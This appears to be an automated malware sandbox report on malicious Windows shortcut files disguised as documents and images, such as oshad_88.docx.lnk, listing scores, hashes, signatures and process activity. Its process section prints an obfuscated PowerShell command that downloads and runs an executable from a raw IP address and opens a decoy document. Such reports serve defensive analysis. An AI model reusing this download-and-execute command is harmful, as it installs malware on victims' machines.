Task scores
  static                                                  10
  brt_1_0147.doc.lnk        windows7-x64                  10
  brt_1_0147.doc.lnk        windows10-2004-x64             3
  oshad_88.docx.lnk         windows7-x64                  10
  oshad_88.docx.lnk         windows10-2004-x64             3
  rv_luti_20...sx.lnk       windows7-x64                  10
  rv_luti_20...sx.lnk       windows10-2004-x64             3
  telegrama_...pg.lnk       windows7-x64                  10
  telegrama_...pg.lnk       windows10-2004-x64             3
Analysis
  max time kernel:  119s
  max time network: 120s
  platform:         windows7_x64
  resource:         win7-20240705-en
  resource tags:    arch:x64, arch:x86, image:win7-20240705-en, locale:en-us, os:windows7-x64, system
  submitted:        30/08/2024, 11:11
Tasks
  static1      (static task)
  behavioral1  sample: brt_1_0147.doc.lnk              resource: win7-20240729-en
  behavioral2  sample: brt_1_0147.doc.lnk              resource: win10v2004-20240802-en
  behavioral3  sample: oshad_88.docx.lnk               resource: win7-20240705-en
  behavioral4  sample: oshad_88.docx.lnk               resource: win10v2004-20240802-en
  behavioral5  sample: rv_luti_2024_roku.xlsx.lnk      resource: win7-20240708-en
  behavioral6  sample: rv_luti_2024_roku.xlsx.lnk      resource: win10v2004-20240802-en
  behavioral7  sample: telegrama_ksv_po_btgr.jpg.lnk   resource: win7-20240704-en
General
  Target: oshad_88.docx.lnk
  Size:   15KB
  MD5:    b8fb0340c7a12ae9d4a3847ac14308cb
  SHA1:   4675f3d8a12942068e609fd2f12f2f020fe5762e
  SHA256: a2bfa5db078137d391b392758fca56b34c8d3c9b0a7e23b1ba9fa9a2edf91000
  SHA512: d9504ca3211e14412ba697d43983e21d100143c5a68be1799e74a704ac76ee6dc999aef09bcd10fb87b9b975bd8184815b6fc2e90ebd96e4f737244a6546d6b0
  SSDEEP: 48:88muavUQSEfFy63YMEDo/atNixCyQvGDDo/DBdCZZGXu/dZZIa7x:88y8GFy63hXEIxCyQ/zuqQ
Malware Config
  (none extracted)
Signatures
  Enumerates physical storage devices (1 TTPs)
    Attempts to interact with connected storage/optical drive(s).
  Suspicious behavior: EnumeratesProcesses (1 IoCs)
    pid   Process
    2572  powershell.exe
  Suspicious use of AdjustPrivilegeToken (1 IoCs)
    description              pid   Process
    Token: SeDebugPrivilege  2572  powershell.exe
  Suspicious use of WriteProcessMemory (3 IoCs)
    description                       pid   Process  procid_target
    PID 2660 wrote to memory of 2572  2660  cmd.exe  32
    PID 2660 wrote to memory of 2572  2660  cmd.exe  32
    PID 2660 wrote to memory of 2572  2660  cmd.exe  32
Processes
  C:\Windows\system32\cmd.exe  (PID: 2660)
    command line: cmd /c C:\Users\Admin\AppData\Local\Temp\oshad_88.docx.lnk
    - Suspicious use of WriteProcessMemory
    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe  (PID: 2572)
      command line: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win 1 echo sviYiTDifmVgwUmQzFgOPYIV; echo JzJdBqRYxLImYrcCLbpdqvjXsIJfpWlZfWY; echo ZKgorOmcNJZZMbukHvugkdfvZrLIe; if (-not(Test-Path 'signalmessenger.zip' -PathType Leaf)){&(G''et-C''om''ma''nd in???e-webr**) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/signalmessenger.zip -OutFile signalmessenger.zip}; echo SRChLBIQjesWVTeXbGypCUPpLnWGEpbzmlAuNYge; Expand-Archive -Path signalmessenger.zip -DestinationPath SecurityCheck; s''tar''t SecurityCheck/Newfts.exe; echo tAtLAczHKJaDGfRcGQexTEXSHDzsHxFvifZtnswW; &(Ge''t-Com''ma''nd in???e-webre***) -uri h''t''tp:''//''83''.''22''2''.''1''91''.''20''1/racs/oshad_88.docx -OutFile oshad_88.docx; echo SQwXgOGQnSfQxMfeOlQMGbil; s''t''a''rt oshad_88.docx
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken